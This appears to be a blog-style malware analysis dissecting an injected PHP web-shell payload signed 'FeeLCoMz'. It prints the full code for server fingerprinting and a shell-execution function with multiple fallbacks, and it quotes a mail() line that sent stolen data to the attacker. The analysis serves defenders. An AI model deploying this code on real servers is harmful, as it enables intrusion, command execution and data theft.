Dissecting Sample No - 3

Well, this example is a little bit sophisticated. Bearing all the functions for a hacker to be able to do
everything on your server...

When injected to a host the function fx() is executed 11 times by default. Returning his signature and the followings:

1- Safe mode is ON or OFF,
2- Operating system and description info,
3- The username of the your php running in,
4- User id of your php running in,
5- The IP number of yourserver,
6- Current working directory,
7- The permissions of current working directory whether writable or not.
8- The hard disk capacity: Total, free and used spaces.
9- And alist of disabled php functions.
Scroll to continue...

##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "
"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096); } pclose($h); }
else { $rez = "Error!"; }
return $rez;
}
function vsize($size) {
if (!is_numeric($size)) { return FALSE; }
else {
if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
else { $size = $size . " B"; }
return $size;
}
}
function hdd($type) {
$P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];
}
die("FeeLCoMz");

Following the detailed information about your system as described above, now the attacker has one more game to play.
The function fx29exec() is designed for this mission. It simply receives a command from the attacker and executes
through whichever the following shell execution commands is available: shell_exec(), system(), passthru() or popen().
In case, any of these functions is not disabled and php has suitable privileges, then attacker may delete, change,
modify, download anything. The other functions of the example not discussed are the private functions for
performing above described tasks.

In some of the injection code files, this kid used "mail("feelcomz@gmail.com",$judul,$body);" That is, he used the e-mail address "feelcomz@gmail.com" for stealing your files/data. You may ask for a help from gmail for finding the IP numbers which accessed this e-mail address, if you had a serious damage.